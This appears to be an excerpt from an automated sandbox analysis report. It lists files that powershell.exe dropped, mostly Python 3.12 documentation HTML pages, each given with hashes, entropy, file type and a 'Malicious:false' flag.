                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="History and License" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/license.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="History of the software: Python was created in the early 1990s by Guido van Rossum at Stichting Mathematisch Centrum (CWI, see https://www.cwi.nl/) in the Netherlands as a successor of a language c..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="History of the software: Python was created in the early 1990s by Guid
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):136209
                              Entropy (8bit):7.997985342944632
                              Encrypted:true
                              SSDEEP:3072:MbzU6mR9iG2fw5FTFelZWozd0p1tfj/OesSfhpb1IZeA6eeWgkq:mTmRkG2fw5FTFe/W/7ASZpCIl6q
                              MD5:2CD58DC69582544FF51F28BE1CC1AF4C
                              SHA1:F28EB3585A5F01B0658B766FEB99DDF04735C317
                              SHA-256:2763E6F9DB4CC8AFA0A4C5CDE2D2F835E8D154EA1BFCEDC361EFD1F90D75B170
                              SHA-512:2BC2B4799A4AFA08561AF3E46C8E476A630A806E46C759E5F3B289DB8BA170F978C57147E6BFB3BC1FEF2802ED067CBB0097F72207D120A40F660C8E7BA7AA88
                              Malicious:false
                              Preview:# Sphinx inventory version 2.# Project: Python.# Version: 3.12.# The remainder of this file is compressed using zlib..x...r.8..x..bE.]..\..*......E93.o.4...H.I.v?...A......&.*3%.;.| .\=F7...:..|....H..._H......?.*....x....k{...$......~...]........7m}J.SM.).q.s.. ..U..Z..A0......Yc.<^C.....-H...8.v.+...j.p.....>.~._m.h..'0Z.....y..7(d......W.{.F...@J......R.de."7W.G$....].W.:.[._...z.Y....W..-............on...z%q.O.<...O...j.:.z%./.....aFdF.5..R.<.u|..d...^m6./.$IK.....S.%eJ...#$..eCZ3 ....."....c..&.Q..N..........">...O.QW...2...q..;U9.8.`.wZ..T<Ll."..|..u. .%..Q......w..5M..Py[........\..`..j:.c.. YV,GV.G...=.5[}x`..**...x..A7..<......LD....A+.}..y...4nI....t$E.X...".'.k.SW.i....?. >F1..M'.n...X..UFb.R....7....:.}.mn....s...~........G.Gw......~.s.......C"p.....z..3!g...gD1...k.....0.=g.M....S..xxH.......{..vs.....9...H..nv...80..=..27O._......$F...<... :@.3Dw..yv.Y.4x.Q..Ou..u.B..e..H..k.*.k...!...&..h..<5a[g).v...d..h.vl....2.Y."..I..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, ASCII text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):87543
                              Entropy (8bit):4.747233786343842
                              Encrypted:false
                              SSDEEP:768:LtPQM4R/G76RdVnn2XIpvbPHPdvBNGt7p3sasFf6659S5IkVqb/jMY764N:LtPQM4R/uIVbPgt7pOp6dJcb/jMY764N
                              MD5:D484D95EABA8098B3CA961C3033CFC4F
                              SHA1:FAD3B8388FE74AE35AD07ECB716EC3EF7B7F0964
                              SHA-256:F652586323B8D47C3B214993EBB39A431A3AA4853877A711B3BADBF6DAC1B77D
                              SHA-512:61466544806CE951E5443071EB11B28AB7310214648E23CC7B299FDF5ACF971D1E812029047D05214B359CBB7B9CCC961522A9B3BC8F4F4BEF3E1AE5C127C8E5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Python Module Index &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml"..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (705), with CRLF line terminators
                              Category:dropped
                              Size (bytes):210816
                              Entropy (8bit):4.824208745627629
                              Encrypted:false
                              SSDEEP:6144:8oqAkBqVcN1cyeE3QKcnqLHYv4mCABsWoKrGr2kYdrNhcCwBLyE0RcU4Jg:83VeUg
                              MD5:70DA210F23B13B8E19A672B45FA35EEB
                              SHA1:9C243D9B2E6ADB356320FB2E06CFF5B7813A851A
                              SHA-256:EC96105C712A9DE979B1A4E8B7355C5494740FC7B5CABAD46432A0190C389A2F
                              SHA-512:064C371E403B554D6278F6D9D67675A3CE4F14676398655B889F43CEC55C7F9585C55817336DBB656AD94DE39080C6B19C5D751443CB2325B2880959334158EC
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="8. Compound statements" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/compound_stmts.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Compound statements contain (groups of) other statements; they affect or control the execution of those other statements in some way. In general, compound statements span multiple lines, although i..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Compound statements contain (groups of) other sta
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (547), with CRLF line terminators
                              Category:dropped
                              Size (bytes):408104
                              Entropy (8bit):4.81949445159808
                              Encrypted:false
                              SSDEEP:6144:Uu45CJnyPXNt3Brlv0/6R6Nr5T3tSyabccAu7jlhhEZErPX+wNXYllSRchD7mv7p:Uu4BkLg
                              MD5:19B677F532FB75D5A9AC791F3F5C278E
                              SHA1:BF0935017BBAB427EB1F5469453A33F1A9425937
                              SHA-256:C950F178E5C51078A3ACD630812C455028485977D101C4A6674C32E171DCE8E4
                              SHA-512:8D14301608D98ECF8C92AB1BD62D16589F9AD9ED4603ED9A31033204AD2655634C2D17A714839307EEAFF46853273740E950F6E212F7FDB8495BE576D5D4F385
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Data model" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/datamodel.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Objects, values and types: Objects are Python.s abstraction for data. All data in a Python program is represented by objects or by relations between objects. (In a sense, and in conformance to Von ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Objects, values and types: Objects are Python.s abstraction
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (535), with CRLF line terminators
                              Category:dropped
                              Size (bytes):48337
                              Entropy (8bit):4.828969417941886
                              Encrypted:false
                              SSDEEP:768:BKqyqMhw/Mf2CfYHLzDArBD+CAlteciwq1wMKMQgDM+764N:BKqyqi4MxSHDA9DBAlte3wq1jKjGM+75
                              MD5:EA7826715CB07101D17FAB7FC5C26C25
                              SHA1:F5C8B24E21CB7ACAB6D6593AA4FF1030FCBBE343
                              SHA-256:28763A1ADDFAECD4C8F85C771AC28B560785425F846B0CD9405B6998119EC043
                              SHA-512:A700DAF294F4D0C41A24915FBB6AC398FF96E22ACBF4E39EE3C92C9562FF274F8A7A2EA551315CF71C2C28F9380F7E90604A1E5349B4A227D224FAC81FAAE9FE
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. Execution model" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/executionmodel.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Structure of a program: A Python program is constructed from code blocks. A block is a piece of Python program text that is executed as a unit. The following are blocks: a module, a function body, ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Structure of a program: A Python program is construct
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (787), with CRLF line terminators
                              Category:dropped
                              Size (bytes):214602
                              Entropy (8bit):4.8178642542737204
                              Encrypted:false
                              SSDEEP:3072:NwRUug6blXRZvHmSVd/SMk8E8Ch0VGwibvfc+Ngw6UqM2MpJ9czSMkiXVieRjlg:sblXRZvHmm/YVD6UqM2MpJ9czYqVi0g
                              MD5:E924F56A3041BCCE730F388B5C55A286
                              SHA1:97F99F35052DEABAE91F8D3C729B1C3C2E827CC0
                              SHA-256:559F85BDE1E9181E5B1F9AB6DF641897293476946156A5C849E11611EF1A1B27
                              SHA-512:48B5979303AB3D1441895FA489CB835D11F49843D9F866E12B39D5D2108D4AA297756E35EF639B0853AFCD5CDB0CFBC98798F408FC5EA51ED17954C72A6F7514
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Expressions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/expressions.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter explains the meaning of the elements of expressions in Python. Syntax Notes: In this and the following chapters, extended BNF notation will be used to describe syntax, not lexical anal..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter explains the meaning of the elements of express
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (496), with CRLF line terminators
                              Category:dropped
                              Size (bytes):86968
                              Entropy (8bit):4.827065448900192
                              Encrypted:false
                              SSDEEP:1536:pqyjMF3JEYFl3tnTqYl7VEeko8yBc+g/L+z40QbaelXiboiXsq36wFy6L9W8WtCu:TYFOaelWLg
                              MD5:AB860A41EA3AF53E736B71B2ABE32A83
                              SHA1:8C24DC68D40EFC21C2E1660F184DB2B8FA1336EF
                              SHA-256:8FC09DA010F5103D724B0C1EE2FC0C874DD60D366DD66369EDF0CD182BD3BAE6
                              SHA-512:E11CE602F622750F0CC4F66E0790FE019D554DA3E658DE2ADD172362EE762E1969E90AF23C3EF95AD625AA2BC7B2CBC39EED508C8F491885E778BE3B756C3CC2
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="10. Full Grammar specification" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/grammar.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This is the full Python grammar, derived directly from the grammar used to generate the CPython parser (see Grammar/python.gram). The version here omits details related to code generation and error..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This is the full Python grammar, derived directl
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (456), with CRLF line terminators
                              Category:dropped
                              Size (bytes):132461
                              Entropy (8bit):4.8223879056791406
                              Encrypted:false
                              SSDEEP:3072:moYFQTaTG+aXNf90CHRfaoZ4M6Prw+ITWcuvn7de5Tlfn+hTkRwyR+/tM8OXGlcT:ATm0CHRfaoZ4M6PM+iP0KTlP+hTkRwyF
                              MD5:B5EC170ED6ABED99CF428EF9D9CF4E00
                              SHA1:F0B3821E51D90A3E5604F9BF7A26F7D3FD5BA85D
                              SHA-256:767F5D82361A1758B51BDE416D3F4F6207EBE879D78BC586225D9FAB40F2304C
                              SHA-512:BE0FB8CFCC45131BE6C0C47C03B04715F6ED72FEB55D26F5CA55C90BF24E8064BDD2F71D689DC630359DD51B6118F04A79B79B86BDB52A262CB7B4646E501536
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. The import system" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/import.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python code in one module gains access to the code in another module by the process of importing it. The import statement is the most common way of invoking the import machinery, but it is not the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python code in one module gains access to the code in anoth
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):26005
                              Entropy (8bit):4.853787939450621
                              Encrypted:false
                              SSDEEP:384:ZHqklSBJnETM+IhqyRCb8t4UkK5APIBKCMkBuXteacXn6TMR76dqEC:pqySvKM3e8taGYMR764N
                              MD5:8F3C4834FBA1A9AF3D135002273C372A
                              SHA1:A09DD9D977F6EBD76EB28012D940C098E76C74EA
                              SHA-256:76B32A0F4597A3C133D255B02651FD51123168660F04E1C7B8F359612448AD85
                              SHA-512:FD6894E2DD8379D67FF3855CFEFB3F58E2500F2505BD66B72C3CB304CB7A83FD4B14437CB463ABC773C733C7CD084E31956AB9F92312C94FCE892D9F0E70E3FA
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Python Language Reference" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This reference manual describes the syntax and .core semantics. of the language. It is terse, but attempts to be exact and complete. The semantics of non-essential built-in object types and of the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This reference manual describes the syntax and
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (413), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22349
                              Entropy (8bit):4.851934490667887
                              Encrypted:false
                              SSDEEP:384:XHqkl/DbrnITMhXYtkGo+1qdR92c6D2tn+TM876dqEC:3qyLnmM1YsR9vCGUM8764N
                              MD5:A691066EA33ADDCFD11C072BD33993AC
                              SHA1:4038D5E8DE4A65A5CE83DD4BEFAF4009AC80236E
                              SHA-256:E72682EF9468B4CC548F3FCF017E242DD28D2DD06FF42C17DA3AAFC6C2D279BA
                              SHA-512:99F18794A3BBDF38179378E96E68C7250A5D0871EF65FA6ABC4D425023980C73676A8A605C6AFF5C216B35E044E3DA901894B82E1C334C241D4D9AB8164F8767
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/introduction.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This reference manual describes the Python programming language. It is not intended as a tutorial. While I am trying to be as precise as possible, I chose to use English rather than formal specific..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This reference manual describes the Python programming lan
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (615), with CRLF line terminators
                              Category:dropped
                              Size (bytes):106796
                              Entropy (8bit):4.907913662970218
                              Encrypted:false
                              SSDEEP:1536:Yqye8M+TPit0NcIu1fw56/2ATSNaGPiR0fwWPJ7r1tY/FlV3Mh764N:TrfQ6/9UfLqXg
                              MD5:A9F1E6AC3F35FC56A7119F34855A37D0
                              SHA1:6AFFA723D30B26C9ABBE775C514C05EB53CF3256
                              SHA-256:0F274DA24B6D5C319E832DFEBB54794EA6C9067B87CB66D641485BB00940922B
                              SHA-512:7E973C7873973B5DC5DF997B784B7275135D604BB7847B209F9F6161DEFD55FA33065FEFB640A4B23A38DB364C8F699A8460013035D2FBDA6EC009B742F0FF77
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Lexical analysis" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/lexical_analysis.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A Python program is read by a parser. Input to the parser is a stream of tokens, generated by the lexical analyzer. This chapter describes how the lexical analyzer breaks a file into tokens. Python..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A Python program is read by a parser. Input to the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (860), with CRLF line terminators
                              Category:dropped
                              Size (bytes):113127
                              Entropy (8bit):4.799817155079819
                              Encrypted:false
                              SSDEEP:1536:sTn3TnJqymHMfTldxIIYcwNcTMkf0dP9k9ok5X8on6fGa6nKP4PryMU764N:sTn3TnyaTlgcwx3dUX8m6OaQdZg
                              MD5:6CCBFA5B4E6BF8501587A488786D2635
                              SHA1:3C7A562DACB7EA264EEE449DBF56F0295B02AF0A
                              SHA-256:10BF1E0E4A8E0A3E2140753C4098B02E94E55B0F27C4C019D9EC05D5F1E76F98
                              SHA-512:E5E18BD9E798A5EE7C3D49CBDDF200046B6AA84C128F661DBF2388ABF7FE1DEDAF15853742B92CB376082EC031354ADFD80F44F8D487DEF8DB6C47A09C83EE72
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="7. Simple statements" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/simple_stmts.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A simple statement is comprised within a single logical line. Several simple statements may occur on a single line separated by semicolons. The syntax for simple statements is: Expression statement..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A simple statement is comprised within a single logic
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (523), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20642
                              Entropy (8bit):4.866097626874894
                              Encrypted:false
                              SSDEEP:384:zNHqkltNpnnUTMzVlJSIN0RnKTMg76dqEC:z9qytNRaMJFNQoMg764N
                              MD5:855FC1F28AE48D6D0026BF878A8C0A93
                              SHA1:1411C76B5DCD8B733E97B26CDD149135EC97E5D8
                              SHA-256:991719A44F397AB2DE74EC7B8D502DCD45FEA8FDDF4B4138C0BB4EDB01F1AF47
                              SHA-512:34DE4E771A41174510FD87C84BDAC0C210C0CA39B16E4690211A530DBD21785E432E83B729F0F5CFF27994474AD4E44410F921D8B88893D79F8349131E737C83
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="9. Top-level components" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/reference/toplevel_components.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Python interpreter can get its input from a number of sources: from a script passed to it as standard input or as program argument, typed in interactively, from a module source file, etc. This ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Python interpreter can get its input fr
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):11148
                              Entropy (8bit):4.70989023871701
                              Encrypted:false
                              SSDEEP:192:0rjUywtrRMJ60vntvvjNrcMGVLTO2pNTkcMGVZ76dqEC:3ywtKs0vntvVcMIUcMq76dqEC
                              MD5:C7F8B72A770B04EFAAF02C553997D6C4
                              SHA1:32630665A1F1B874FC3A6513DE8D0A56C0ECEF12
                              SHA-256:A1173CF7147ADDA4370B2A8AC2E97E5CAEFBF7D5E60EDE8D837817792887265E
                              SHA-512:96C282798FBC3CD144383D114B74BCC4B2F9E8C1B3A5BBCA3CA14F9F3AA0572C6E67D78050E10DE098C1316327CDF70DD0C5B375289D6E2C742BE10130B76712
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Search &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=bb723527" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. .. <script src="_static/documentation_options.js?v=2c828074"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <script src="_static/searchtools.js"></script>.. <script src="_static/language
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):3446258
                              Entropy (8bit):5.096774962739672
                              Encrypted:false
                              SSDEEP:24576:iBPGfACWcz683Nz8T8//s6fTKG8yj/iAJs:3zX/UMKMbO
                              MD5:D1F162987C134B056E31AABC710D52C2
                              SHA1:70A4E7C92CD7A34539C024ECC7C79C38846E47AA
                              SHA-256:6B1E63D1446BC75125FDFC4F7B1378CD3419D31D4FF5D0399ADCB9F63ABE0E63
                              SHA-512:108D0B86737A1AF0EBD1189645EB697390E4B1923C54E1D66CCCF53D8D850BAAFCA3B352189AA684D8ADA433DE4713B9EED873EA037FE81EDF0808A0E245B7D8
                              Malicious:false
                              Preview:Search.setIndex({"docnames": ["about", "bugs", "c-api/abstract", "c-api/allocation", "c-api/apiabiversion", "c-api/arg", "c-api/bool", "c-api/buffer", "c-api/bytearray", "c-api/bytes", "c-api/call", "c-api/capsule", "c-api/cell", "c-api/code", "c-api/codec", "c-api/complex", "c-api/concrete", "c-api/contextvars", "c-api/conversion", "c-api/coro", "c-api/datetime", "c-api/descriptor", "c-api/dict", "c-api/exceptions", "c-api/file", "c-api/float", "c-api/frame", "c-api/function", "c-api/gcsupport", "c-api/gen", "c-api/hash", "c-api/import", "c-api/index", "c-api/init", "c-api/init_config", "c-api/intro", "c-api/iter", "c-api/iterator", "c-api/list", "c-api/long", "c-api/mapping", "c-api/marshal", "c-api/memory", "c-api/memoryview", "c-api/method", "c-api/module", "c-api/none", "c-api/number", "c-api/objbuffer", "c-api/object", "c-api/objimpl", "c-api/perfmaps", "c-api/refcounting", "c-api/reflection", "c-api/sequence", "c-api/set", "c-api/slice", "c-api/stable", "c-api/structures", "c-ap
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (434), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25012
                              Entropy (8bit):4.882657945412019
                              Encrypted:false
                              SSDEEP:768:FqyxaEb6M265nbnRfYdi8vlxC4BJPNzaE8IM6764N:Fqyxa9Mbrp+ltlzaSM6764N
                              MD5:52D41AD8C050C2C4C616AD58454C41B2
                              SHA1:193D24A42C9F58F4B79EF589FA22203B8C508704
                              SHA-256:8CAB2DC39C2BE3F6ADF04A1933424E692EB68681BCF483C28A4CFE25EA332E69
                              SHA-512:30A8044EA5DA25F8892F994D06BE42BC82FC1B2A1366E3A6B1E04045DCE496F0716D87C718E29C05819FBD710C0574823C6140827F383C25C54D5260C12114A7
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="16. Appendix" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/appendix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Interactive Mode: Error Handling: When an error occurs, the interpreter prints an error message and a stack trace. In interactive mode, it then returns to the primary prompt; when input came from a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Interactive Mode: Error Handling: When an error occurs, the interp
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17730
                              Entropy (8bit):4.8279810207897365
                              Encrypted:false
                              SSDEEP:384:gpHqklHYaQ0nhTMVbGD+8IxP5l0MYXQcn1TM676dqEC:cqy4IlMVkoxPL0pxM6764N
                              MD5:C9E89C531222719427E9F0B60853FB92
                              SHA1:0180859B3A446B5734644A7AF45FE8573D475175
                              SHA-256:5691617AAF1833D88460F79EB6BA32650647B3C642B6EA0F2097174FB35F2F46
                              SHA-512:620A6EA0CE5AB682A6D84BB71BE3A3AD1879EE79DB78886DE43EEE1C122C9D6A48A8ECAC53F876637DB6506435A28013B23026BE82C3EBC4A70C9B654310C0E9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Whetting Your Appetite" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/appetite.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="If you do much work on computers, eventually you find that there.s some task you.d like to automate. For example, you may wish to perform a search-and-replace over a large number of text files, or ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="If you do much work on computers, eventually you
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (477), with CRLF line terminators
                              Category:dropped
                              Size (bytes):104306
                              Entropy (8bit):4.789736902214165
                              Encrypted:false
                              SSDEEP:1536:oqyrvMj7SNPxBjfzRaozKb4mXKs2dZFtceXr5gevX83PIKh0AofuVRAdeyM7764N:Qy2bQ33Xc7rSoMzAg
                              MD5:A28099AFB706CED80B9B0CCAAA963A57
                              SHA1:5E4DD5D985F02E23197864AB5CA03C5D8B6C685A
                              SHA-256:5549BA83A8F4BAC426AC67DFAE7B81EC721752E02F7A962991B595C82B3017E2
                              SHA-512:D723E695AFBC82F29AD2CC73C15ACD48C4B16D0CC53F79717C4CCBA3DD94B38461D06EEF0F46A66081A31AF1F0110746ED98EB4FCF60B2A3A71FDA6708FAAC32
                              Malicious:false
